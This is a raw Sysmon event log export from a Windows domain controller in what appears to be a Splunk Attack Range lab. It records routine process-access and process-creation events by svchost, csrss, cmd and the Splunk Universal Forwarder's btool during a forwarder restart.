13:12:05.198{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003576Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.198{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003575Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.198{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003574Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.198{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4325-6000-B700-000000009A01}4380C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003573Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.198{08A6967A-4325-6000-B600-000000009A01}860876C:\Windows\system32\cmd.exe{08A6967A-4325-6000-B700-000000009A01}4380C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003572Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.211{08A6967A-4325-6000-B700-000000009A01}4380C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list httpServerListener: --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{08A6967A-4325-6000-B600-000000009A01}860C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list httpServerListener: --no-log 10341000x80000000000000003571Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.198{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-4325-6000-B600-000000009A01}860C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003570Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.198{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003569Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.198{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003568Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.198{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003567Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.198{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003566Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.198{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003565Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.198{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003564Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.198{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003563Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.198{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003562Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.198{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003561Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.198{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4325-6000-B600-000000009A01}860C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003560Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.198{08A6967A-4321-6000-A600-000000009A01}4240748C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{08A6967A-4325-6000-B600-000000009A01}860C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+13ac4|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+12176|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+19082|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d94e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003559Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:05.205{08A6967A-4325-6000-B600-000000009A01}860C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list httpServerListener: --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4321-6000-A600-000000009A01}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2316 10341000x80000000000000003826Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.967{08A6967A-4326-6000-CB00-000000009A01}31244616C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003825Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.717{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4326-6000-CB00-000000009A01}3124C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003824Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.717{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003823Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.717{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003822Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.717{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003821Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.717{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003820Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.717{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003819Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.717{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003818Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.717{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 